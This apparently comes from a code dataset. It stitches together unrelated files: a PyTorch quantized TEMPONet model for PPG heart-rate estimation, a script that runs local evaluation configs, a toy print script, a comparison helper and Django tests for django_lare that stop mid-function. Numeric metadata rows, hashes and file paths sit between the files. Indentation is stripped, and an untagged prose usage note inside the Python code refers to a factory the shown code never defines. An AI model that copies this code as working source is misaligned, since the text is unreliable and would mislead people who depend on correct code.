wbits=wbits[8],
abits=abits[8],
share_weight=share_weight
)
# 1st instance of regressor
self.regr0 = Regressor(
ft_in=sum(self.ch[8]) * 4,
ft_out=self.ch[9],
wbits=wbits[9],
abits=abits[9]
)
# 2nd instance of regressor
self.regr1 = Regressor(
ft_in=self.ch[9],
ft_out=self.ch[10],
wbits=wbits[10],
abits=abits[10]
)
self.out_neuron = qm.QuantizedLinear(
inplane=self.ch[10],
outplane=1,
wbits=wbits[11],
abits=abits[11]
)
def forward(self, x):
x = self.cb0(self.tcb01(self.tcb00(x)))
x = self.cb1(self.tcb11(self.tcb10(x)))
x = self.cb2(self.tcb21(self.tcb20(x)))
x = x.flatten(1)
x = self.regr0(x)
x = self.regr1(x)
x = self.out_neuron(x)
return x
class TimePPG_quantized(BaseModel):
"""
TEMPONet architecture:
Three repeated instances of TemporalConvBlock and ConvBlock organized as follows:
- TemporalConvBlock
- ConvBlock
Two instances of Regressor followed by a final Linear layer with a single neuron.
"""
def __init__(self, conv, wbits, abits, channels = 'Not Initialized', share_weight = True, dataset_name='PPG_Dalia', dataset_args={}):
super(TimePPG_quantized, self).__init__()
self.conv_func = conv
self.dil = [2, 2, 1, 4, 4, 8, 8]
        self.rf = [5, 5, 5, 9, 9, 17, 17]
if isinstance(channels, list):
self.ch = channels
else:
            print('Missing channels configuration for TimePPG')
            sys.exit(1)  # configuration error, so exit with a non-zero status
# 1st instance of two TempConvBlocks and ConvBlock
k_tcb00 = ceil(self.rf[0] / self.dil[0])
self.tcb00 = TempConvBlock(conv,
ch_in=4,
ch_out=self.ch[0],
k_size=k_tcb00,
dil=self.dil[0],
pad=((k_tcb00 - 1) * self.dil[0] + 1) // 2,
wbits=wbits[0],
abits=abits[0],
share_weight=share_weight,
first_layer = True
)
k_tcb01 = ceil(self.rf[1] / self.dil[1])
self.tcb01 = TempConvBlock(conv,
ch_in=self.ch[0],
ch_out=self.ch[1],
k_size=k_tcb01,
dil=self.dil[1],
pad=((k_tcb01 - 1) * self.dil[1] + 1) // 2,
wbits=wbits[1],
abits=abits[1],
share_weight=share_weight
)
k_cb0 = ceil(self.rf[2] / self.dil[2])
self.cb0 = ConvBlock(conv,
ch_in=self.ch[1],
ch_out=self.ch[2],
k_size=k_cb0,
strd=1,
pad=((k_cb0 - 1) * self.dil[2] + 1) // 2,
dilation=self.dil[2],
wbits=wbits[2],
abits=abits[2],
share_weight=share_weight
)
# 2nd instance of two TempConvBlocks and ConvBlock
k_tcb10 = ceil(self.rf[3] / self.dil[3])
self.tcb10 = TempConvBlock(conv,
ch_in=self.ch[2],
ch_out=self.ch[3],
k_size=k_tcb10,
dil=self.dil[3],
pad=((k_tcb10 - 1) * self.dil[3] + 1) // 2,
wbits=wbits[3],
abits=abits[3],
share_weight=share_weight
)
k_tcb11 = ceil(self.rf[4] / self.dil[4])
self.tcb11 = TempConvBlock(conv,
ch_in=self.ch[3],
ch_out=self.ch[4],
k_size=k_tcb11,
dil=self.dil[4],
pad=((k_tcb11 - 1) * self.dil[4] + 1) // 2,
wbits=wbits[4],
abits=abits[4],
share_weight=share_weight
)
self.cb1 = ConvBlock(conv,
ch_in=self.ch[4],
ch_out=self.ch[5],
k_size=5,
strd=2,
pad=2,
wbits=wbits[5],
abits=abits[5],
share_weight=share_weight
)
        # 3rd instance of TempConvBlock and ConvBlock
k_tcb20 = ceil(self.rf[5] / self.dil[5])
self.tcb20 = TempConvBlock(conv,
ch_in=self.ch[5],
ch_out=self.ch[6],
k_size=k_tcb20,
dil=self.dil[5],
pad=((k_tcb20 - 1) * self.dil[5] + 1) // 2,
wbits=wbits[6],
abits=abits[6],
share_weight=share_weight
)
k_tcb21 = ceil(self.rf[6] / self.dil[6])
self.tcb21 = TempConvBlock(conv,
ch_in=self.ch[6],
ch_out=self.ch[7],
k_size=k_tcb21,
dil=self.dil[6],
pad=((k_tcb21 - 1) * self.dil[6] + 1) // 2,
wbits=wbits[7],
abits=abits[7],
share_weight=share_weight
)
self.cb2 = ConvBlock(conv,
ch_in=self.ch[7],
ch_out=self.ch[8],
k_size=5,
strd=4,
pad=4,
wbits=wbits[8],
abits=abits[8],
share_weight=share_weight
)
# 1st instance of regressor
self.regr0 = Regressor(
ft_in=self.ch[8] * 4,
ft_out=self.ch[9],
wbits=wbits[9],
abits=abits[9]
)
# 2nd instance of regressor
self.regr1 = Regressor(
ft_in=self.ch[9],
ft_out=self.ch[10],
wbits=wbits[10],
abits=abits[10]
)
self.out_neuron = qm.QuantizedLinear(
inplane=self.ch[10],
outplane=1,
wbits=wbits[11],
abits=abits[11]
)
def forward(self, x):
x = self.cb0(self.tcb01(self.tcb00(x)))
x = self.cb1(self.tcb11(self.tcb10(x)))
x = self.cb2(self.tcb21(self.tcb20(x)))
x = x.flatten(1)
x = self.regr0(x)
x = self.regr1(x)
x = self.out_neuron(x)
return x
class TimePPG(BaseModel):
"""
TEMPONet architecture:
Three repeated instances of TemporalConvBlock and ConvBlock organized as follows:
- TemporalConvBlock
- ConvBlock
Two instances of Regressor followed by a final Linear layer with a single neuron.
"""
    def __init__(self, conv, wbits, abits, channels = 'Not Initialized', share_weight = True, dataset_name='PPG_Dalia', dataset_args={}):
super(TimePPG, self).__init__()
self.conv_func = conv
self.dil = [
2, 2, 1,
4, 4,
8, 8
]
self.rf = [
5, 5, 5,
9, 9,
17, 17
]
if isinstance(channels, list):
self.ch = channels
else:
            print('Missing channels configuration for TimePPG')
            sys.exit(1)  # configuration error, so exit with a non-zero status
# 1st instance of two TempConvBlocks and ConvBlock
k_tcb00 = ceil(self.rf[0]/self.dil[0])
self.tcb00 = TempConvBlock(conv,
ch_in = 4,
ch_out = self.ch[0],
k_size = k_tcb00,
dil = self.dil[0],
pad = ((k_tcb00-1)*self.dil[0]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight,
first_layer = True
)
k_tcb01 = ceil(self.rf[1]/self.dil[1])
self.tcb01 = TempConvBlock(conv,
ch_in = self.ch[0],
ch_out = self.ch[1],
k_size = k_tcb01,
dil = self.dil[1],
pad = ((k_tcb01-1)*self.dil[1]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
k_cb0 = ceil(self.rf[2]/self.dil[2])
self.cb0 = ConvBlock(conv,
ch_in = self.ch[1],
ch_out = self.ch[2],
k_size = k_cb0,
strd = 1,
pad = ((k_cb0-1)*self.dil[2]+1)//2,
dilation = self.dil[2],
wbits = wbits,
abits = abits,
share_weight = share_weight
)
# 2nd instance of two TempConvBlocks and ConvBlock
k_tcb10 = ceil(self.rf[3]/self.dil[3])
self.tcb10 = TempConvBlock(conv,
ch_in = self.ch[2],
ch_out = self.ch[3],
k_size = k_tcb10,
dil = self.dil[3],
pad = ((k_tcb10-1)*self.dil[3]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
k_tcb11 = ceil(self.rf[4]/self.dil[4])
self.tcb11 = TempConvBlock(conv,
ch_in = self.ch[3],
ch_out = self.ch[4],
k_size = k_tcb11,
dil = self.dil[4],
pad = ((k_tcb11-1)*self.dil[4]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
self.cb1 = ConvBlock(conv,
ch_in = self.ch[4],
ch_out = self.ch[5],
k_size = 5,
strd = 2,
pad = 2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
        # 3rd instance of TempConvBlock and ConvBlock
k_tcb20 = ceil(self.rf[5]/self.dil[5])
self.tcb20 = TempConvBlock(conv,
ch_in = self.ch[5],
ch_out = self.ch[6],
k_size = k_tcb20,
dil = self.dil[5],
pad = ((k_tcb20-1)*self.dil[5]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
k_tcb21 = ceil(self.rf[6]/self.dil[6])
self.tcb21 = TempConvBlock(conv,
ch_in = self.ch[6],
ch_out = self.ch[7],
k_size = k_tcb21,
dil = self.dil[6],
pad = ((k_tcb21-1)*self.dil[6]+1)//2,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
self.cb2 = ConvBlock(conv,
ch_in = self.ch[7],
ch_out = self.ch[8],
k_size = 5,
strd = 4,
pad = 4,
wbits = wbits,
abits = abits,
share_weight = share_weight
)
# 1st instance of regressor
self.regr0 = Regressor(
ft_in = self.ch[8] * 4,
ft_out = self.ch[9],
wbits = 8,
abits = 8
)
# 2nd instance of regressor
self.regr1 = Regressor(
ft_in = self.ch[9],
ft_out = self.ch[10],
wbits = 8,
abits = 8
)
self.out_neuron = nn.Linear(
in_features = self.ch[10],
out_features = 1
)
def forward(self, x):
x = self.cb0(self.tcb01(self.tcb00(x)))
x = self.cb1(self.tcb11(self.tcb10(x)))
x = self.cb2(self.tcb21(self.tcb20(x)))
x = x.flatten(1)
x = self.regr0(x)
x = self.regr1(x)
x = self.out_neuron(x)
return x
def complexity_loss(self):
size_product = []
loss = 0
for m in self.modules():
if isinstance(m, self.conv_func):
loss += m.complexity_loss()
size_product += [m.size_product]
normalizer = size_product[0].item()
loss /= normalizer
return loss
def fetch_best_arch(self):
sum_bitops, sum_bita, sum_bitw = 0, 0, 0
sum_mixbitops, sum_mixbita, sum_mixbitw = 0, 0, 0
layer_idx = 0
best_arch = None
for m in self.modules():
if isinstance(m, self.conv_func):
layer_arch, bitops, bita, bitw, mixbitops, mixbita, mixbitw = m.fetch_best_arch(layer_idx)
if best_arch is None:
best_arch = layer_arch
else:
for key in layer_arch.keys():
if key not in best_arch:
best_arch[key] = layer_arch[key]
else:
best_arch[key].append(layer_arch[key][0])
sum_bitops += bitops
sum_bita += bita
sum_bitw += bitw
sum_mixbitops += mixbitops
sum_mixbita += mixbita
sum_mixbitw += mixbitw
layer_idx += 1
return best_arch, sum_bitops, sum_bita, sum_bitw, sum_mixbitops, sum_mixbita, sum_mixbitw
class TempConvBlock_multiprec(BaseModel):
"""
    Temporal Convolutional Block composed of one temporal convolutional layer.
The block is composed of :
- Conv1d layer
- Chomp1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param dil: Amount of dilation
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, dil, pad, wbits, abits, share_weight, first_layer=False):
super(TempConvBlock_multiprec, self).__init__()
if ch_out[0]!=0:
self.tcn0 = conv(
ch_in,
ch_out[0],
kernel_size=k_size,
dilation=dil,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=2,
share_weight=share_weight,
first_layer=first_layer
)
if ch_out[1]!=0:
self.tcn1 = conv(
ch_in,
ch_out[1],
kernel_size=k_size,
dilation=dil,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=4,
share_weight=share_weight,
first_layer=first_layer
)
if ch_out[2]!=0:
self.tcn2 = conv(
ch_in,
ch_out[2],
kernel_size=k_size,
dilation=dil,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=8,
share_weight=share_weight,
first_layer=first_layer
)
self.bn0 = nn.BatchNorm1d(num_features=sum(ch_out))
    def forward(self, x):
        # concatenate the outputs of whichever precision branches were built
        outs = [getattr(self, name)(x) for name in ('tcn0', 'tcn1', 'tcn2')
                if hasattr(self, name)]
        x = outs[0] if len(outs) == 1 else torch.cat(outs, dim=1)
        x = self.bn0(x)
        return x
class TempConvBlock(BaseModel):
"""
    Temporal Convolutional Block composed of one temporal convolutional layer.
The block is composed of :
- Conv1d layer
- Chomp1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param dil: Amount of dilation
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, dil, pad, wbits, abits, share_weight, first_layer = False):
super(TempConvBlock, self).__init__()
self.tcn0 = conv(
ch_in,
ch_out,
kernel_size = k_size,
dilation = dil,
padding = pad,
groups = 1,
bias = False,
abits = abits,
wbits = wbits,
share_weight = share_weight,
first_layer = first_layer
)
self.bn0 = nn.BatchNorm1d(num_features = ch_out)
def forward(self, x):
x = self.bn0(self.tcn0(x))
return x
class ConvBlock_multiprec(BaseModel):
"""
Convolutional Block composed of:
- Conv1d layer
- AvgPool1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param strd: Amount of stride
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, strd, pad, wbits, abits, share_weight, dilation=1):
super(ConvBlock_multiprec, self).__init__()
if ch_out[0]!=0:
self.conv0 = conv(
ch_in,
ch_out[0],
kernel_size=k_size,
stride=strd,
dilation=dilation,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=wbits,
share_weight=share_weight,
first_layer=False
)
if ch_out[1]!=0:
self.conv1 = conv(
ch_in,
ch_out[1],
kernel_size=k_size,
stride=strd,
dilation=dilation,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=wbits,
share_weight=share_weight,
first_layer=False
)
if ch_out[2]!=0:
self.conv2 = conv(
ch_in,
ch_out[2],
kernel_size=k_size,
stride=strd,
dilation=dilation,
padding=pad,
groups=1,
bias=False,
abits=abits,
wbits=wbits,
share_weight=share_weight,
first_layer=False
)
self.pool0 = nn.AvgPool1d(
kernel_size=2,
stride=2,
padding=0
)
self.bn0 = nn.BatchNorm1d(sum(ch_out))
    def forward(self, x):
        # concatenate the outputs of whichever precision branches were built
        outs = [getattr(self, name)(x) for name in ('conv0', 'conv1', 'conv2')
                if hasattr(self, name)]
        x = outs[0] if len(outs) == 1 else torch.cat(outs, dim=1)
        x = self.bn0(self.pool0(x))
        return x
class ConvBlock(BaseModel):
"""
Convolutional Block composed of:
- Conv1d layer
- AvgPool1d layer
- ReLU layer
- BatchNorm1d layer
:param ch_in: Number of input channels
:param ch_out: Number of output channels
:param k_size: Kernel size
:param strd: Amount of stride
:param pad: Amount of padding
"""
def __init__(self, conv, ch_in, ch_out, k_size, strd, pad, wbits, abits, share_weight, dilation=1):
super(ConvBlock, self).__init__()
self.conv0 = conv(
ch_in,
ch_out,
kernel_size = k_size,
stride = strd,
dilation = dilation,
padding = pad,
groups = 1,
bias = False,
abits = abits,
wbits = wbits,
share_weight = share_weight,
first_layer = False
)
self.pool0 = nn.AvgPool1d(
kernel_size = 2,
stride = 2,
padding = 0
)
self.bn0 = nn.BatchNorm1d(ch_out)
def forward(self, x):
x = self.bn0(
self.pool0(
self.conv0(
x
)
)
)
return x
class Regressor(BaseModel):
"""
Regressor block composed of :
- Linear layer
- ReLU layer
- BatchNorm1d layer
:param ft_in: Number of input channels
:param ft_out: Number of output channels
"""
def __init__(self, ft_in, ft_out, wbits, abits):
super(Regressor, self).__init__()
self.ft_in = ft_in
self.ft_out = ft_out
self.fc0 = qm.QuantizedLinear(
inplane = ft_in,
outplane = ft_out,
wbits=wbits,
abits=abits
)
self.bn0 = nn.BatchNorm1d(
num_features = ft_out
)
def forward(self, x):
x = self.bn0(
self.fc0(
x
)
)
return x
class Chomp1d(BaseModel):
"""
Module that perform a chomping operation on the input tensor.
    It is used to chomp the amount of zero-padding added on the right of the input tensor; this operation is necessary to compute causal convolutions.
:param chomp_size: amount of padding 0s to be removed
"""
def __init__(self, chomp_size):
super(Chomp1d, self).__init__()
self.chomp_size = chomp_size
def forward(self, x):
return x[:, :, :-self.chomp_size].contiguous()
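A brief usage sketch for the fixed-precision factories (hypothetical shapes; assumes the quant_module_1d backend is importable). The three ConvBlocks jointly downsample time by 64x (conv strides 1, 2, 4 each followed by a /2 average pool), and regr0 expects ch[8] * 4 input features, so a 4-channel window of length 256 flattens to exactly the expected size:

model = TimePPG_big_quantized_8()
x = torch.randn(16, 4, 256)  # (batch, input channels, time)
hr = model(x)                # -> (16, 1) heart-rate estimate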
| 42.108946
| 195
| 0.503124
| 5,814
| 47,541
| 3.952872
| 0.054008
| 0.024889
| 0.028196
| 0.028196
| 0.874467
| 0.866591
| 0.853451
| 0.851275
| 0.843878
| 0.834436
| 0
| 0.076761
| 0.372752
| 47,541
| 1,128
| 196
| 42.146277
| 0.69393
| 0.093288
| 0
| 0.707889
| 0
| 0
| 0.058526
| 0.033902
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056503
| false
| 0.009595
| 0.018124
| 0.026652
| 0.13113
| 0.003198
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50ae09d9ed928ff2fe69cee13beefcf7d848b329
| 550
|
py
|
Python
|
eval_mosmed_timm-regnetx_002_ShiftScaleRotate.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_ShiftScaleRotate.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_ShiftScaleRotate.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_0_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_1_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_2_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_3_ShiftScaleRotate.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_4_ShiftScaleRotate.yml",
]
for l in ls:
os.system(l)
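os.system silently ignores non-zero exit codes; a hedged alternative sketch using the standard library's subprocess, which stops at the first failing run:

import subprocess
for cmd in ls:
    subprocess.run(cmd.split(), check=True)  # raises CalledProcessError on failure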
| 50
| 104
| 0.849091
| 80
| 550
| 5.4625
| 0.3
| 0.114416
| 0.1373
| 0.217391
| 0.883295
| 0.883295
| 0.883295
| 0.883295
| 0.883295
| 0.883295
| 0
| 0.038536
| 0.056364
| 550
| 11
| 105
| 50
| 0.803468
| 0
| 0
| 0
| 0
| 0
| 0.880218
| 0.653358
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
50e0e5a22159288e161921eb1fd25e46702ad613
| 99
|
py
|
Python
|
2.py
|
chauhanmahavir/Python-Basics
|
c250a9eee203e1188a968ba2c60262442719fa49
|
[
"MIT"
] | 1
|
2020-08-05T05:38:44.000Z
|
2020-08-05T05:38:44.000Z
|
2.py
|
chauhanmahavir/Python-Basics
|
c250a9eee203e1188a968ba2c60262442719fa49
|
[
"MIT"
] | null | null | null |
2.py
|
chauhanmahavir/Python-Basics
|
c250a9eee203e1188a968ba2c60262442719fa49
|
[
"MIT"
] | null | null | null |
print('hii' + str(5))
print(int(8) + 5)
print(float(8.5) + 5)
print(int(8.5) + 5)
#print(int('C'))
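# Note: int('C') raises ValueError, which is presumably why the line above is
# commented out; int() only parses base-10 digit strings unless a base is given
# explicitly, e.g. int('C', 16) == 12.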
| 16.5
| 21
| 0.555556
| 21
| 99
| 2.619048
| 0.380952
| 0.436364
| 0.490909
| 0.363636
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101124
| 0.10101
| 99
| 5
| 22
| 19.8
| 0.516854
| 0.151515
| 0
| 0
| 0
| 0
| 0.038462
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
50e3d842c8440f9384677d32fd702dce06cd98e5
| 338
|
py
|
Python
|
src/interpreter/functions/compare.py
|
b-Development-Team/b-star
|
e1a47e118d0f30f7caca5ecc3ac08fadaf2227c6
|
[
"MIT"
] | 1
|
2021-12-28T22:07:10.000Z
|
2021-12-28T22:07:10.000Z
|
src/interpreter/functions/compare.py
|
b-Development-Team/b-star
|
e1a47e118d0f30f7caca5ecc3ac08fadaf2227c6
|
[
"MIT"
] | 6
|
2022-01-07T22:49:19.000Z
|
2022-03-11T05:39:04.000Z
|
src/interpreter/functions/compare.py
|
b-Development-Team/b-star
|
e1a47e118d0f30f7caca5ecc3ac08fadaf2227c6
|
[
"MIT"
] | 4
|
2021-11-26T01:38:32.000Z
|
2022-02-27T20:54:08.000Z
|
def compare(v1, operator, v2):
if operator == ">":
return v1 > v2
elif operator == "<":
return v1 < v2
elif operator == ">=":
return v1 >= v2
elif operator == "<=":
return v1 <= v2
elif operator == "=" or "==":
return v1 == v2
elif operator == "!=":
return v1 != v2
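A few usage examples, given the fixed branches above:

assert compare(3, ">=", 2) is True
assert compare(1, "==", 2) is False
assert compare("a", "<", "b") is True  # works for any orderable operands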
| 24.142857
| 33
| 0.455621
| 36
| 338
| 4.277778
| 0.25
| 0.311688
| 0.38961
| 0.584416
| 0.831169
| 0.831169
| 0.831169
| 0.831169
| 0.623377
| 0.623377
| 0
| 0.066038
| 0.372781
| 338
| 13
| 34
| 26
| 0.660377
| 0
| 0
| 0
| 0
| 0
| 0.032544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0
| 0
| 0.538462
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
0fdd40f7d99630e4a59354a815a722227f0da17d
| 12,320
|
py
|
Python
|
django_lare/tests.py
|
iekadou/django-lare
|
ac9a0c37b42b30deaacf8b4c12282dd74a806b2f
|
[
"MIT"
] | null | null | null |
django_lare/tests.py
|
iekadou/django-lare
|
ac9a0c37b42b30deaacf8b4c12282dd74a806b2f
|
[
"MIT"
] | 1
|
2016-05-20T08:30:28.000Z
|
2016-05-20T08:30:28.000Z
|
django_lare/tests.py
|
iekadou/django-lare
|
ac9a0c37b42b30deaacf8b4c12282dd74a806b2f
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django import VERSION as DJANGO_VERSION
from django.test import TestCase, Client
from django_lare.models import Lare
from django_lare.test_views import *
if DJANGO_VERSION < (1, 10):
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'^page1/$', Page1View.as_view(), name='page_1'),
url(r'^page1/content1/$', Page1Content1View.as_view(), name='content_1'),
url(r'^page1/content1/inner_content1/$', Page1Content1InnerContent1View.as_view(), name='inner_content_1'),
url(r'^page1/content1/inner_content2/$', Page1Content1InnerContent2View.as_view(), name='inner_content_2'),
url(r'^page1/content2/$', Page1Content2View.as_view(), name='content_2'),
url(r'^page2/$', Page2View.as_view(), name='page_2'),
url(r'^no-lare-page/$', NoLareView.as_view(), name='no_lare_page'),
)
from django.core.urlresolvers import reverse
elif DJANGO_VERSION <= (2, 0):
from django.conf.urls import include, url
urlpatterns = [
url(r'^page1/$', Page1View.as_view(), name='page_1'),
url(r'^page1/content1/$', Page1Content1View.as_view(), name='content_1'),
url(r'^page1/content1/inner_content1/$', Page1Content1InnerContent1View.as_view(), name='inner_content_1'),
url(r'^page1/content1/inner_content2/$', Page1Content1InnerContent2View.as_view(), name='inner_content_2'),
url(r'^page1/content2/$', Page1Content2View.as_view(), name='content_2'),
url(r'^page2/$', Page2View.as_view(), name='page_2'),
url(r'^no-lare-page/$', NoLareView.as_view(), name='no_lare_page'),
]
from django.urls import reverse
else:
    from django.urls import include, re_path
    # path() matches literal route strings, so these regex patterns must use re_path()
    urlpatterns = [
        re_path(r'^page1/$', Page1View.as_view(), name='page_1'),
        re_path(r'^page1/content1/$', Page1Content1View.as_view(), name='content_1'),
        re_path(r'^page1/content1/inner_content1/$', Page1Content1InnerContent1View.as_view(), name='inner_content_1'),
        re_path(r'^page1/content1/inner_content2/$', Page1Content1InnerContent2View.as_view(), name='inner_content_2'),
        re_path(r'^page1/content2/$', Page1Content2View.as_view(), name='content_2'),
        re_path(r'^page2/$', Page2View.as_view(), name='page_2'),
        re_path(r'^no-lare-page/$', NoLareView.as_view(), name='no_lare_page'),
    ]
from django.urls import reverse
class TestLareRequests(TestCase):
urls = 'django_lare.tests'
page_1_string = 'page_1'
content_1_string = 'content_1'
content_2_string = 'content_2'
# underscore to prevent detecting content_1 as part of inner_content_1
inner_content_1_string = 'inner_con_tent_1'
inner_content_2_string = 'inner_con_tent_2'
page_2_string = 'page_2'
no_lare_page_string = 'no-lare-page'
# testing page level namespace
def test_page_1_no_lare(self):
client = Client()
response = client.get(reverse('page_1'))
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, 'Site1.Page1')
def test_page_1_lare_with_namespace(self):
client = Client()
response = client.get(reverse('page_1'), **{'HTTP_X_LARE': 'Site1.Page2'})
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1')
def test_page_1_lare_different_namespace(self):
client = Client()
response = client.get(reverse('page_1'), **{'HTTP_X_LARE': 'Site2'})
self.assertContains(response, self.page_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1')
# testing content level namespace
def test_content_1_no_lare(self):
client = Client()
response = client.get(reverse('content_1'))
self.assertContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_current_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content1'})
self.assertNotContains(response, self.page_1_string)
self.assertNotContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_page_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page1'})
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_content_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_different_page_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site1.Page2'})
self.assertContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
def test_content_1_lare_different_site_namespace(self):
client = Client()
response = client.get(reverse('content_1'), **{'HTTP_X_LARE': 'Site2.Page1'})
self.assertContains(response, self.page_1_string)
self.assertContains(response, self.content_1_string)
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1')
# testing inner_content level namespace
def test_inner_content_1_no_lare(self):
client = Client()
response = client.get(reverse('inner_content_1'))
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<html>')
self.assertNotContains(response, '<lare-body>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_with_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content1.InnerContent2'})
self.assertContains(response, self.inner_content_1_string)
self.assertNotContains(response, self.content_1_string)
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_different_content_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site1.Page1.Content2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertNotContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_different_page_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site1.Page2'})
self.assertContains(response, self.inner_content_1_string)
self.assertContains(response, self.content_1_string)
self.assertContains(response, self.page_1_string)
self.assertContains(response, '<lare-body>')
self.assertNotContains(response, '<html>')
self.assertContains(response, 'Site1.Page1.Content1.InnerContent1')
def test_inner_content_1_lare_different_site_namespace(self):
client = Client()
response = client.get(reverse('inner_content_1'), **{'HTTP_X_LARE': 'Site2.Page1.Content1'})
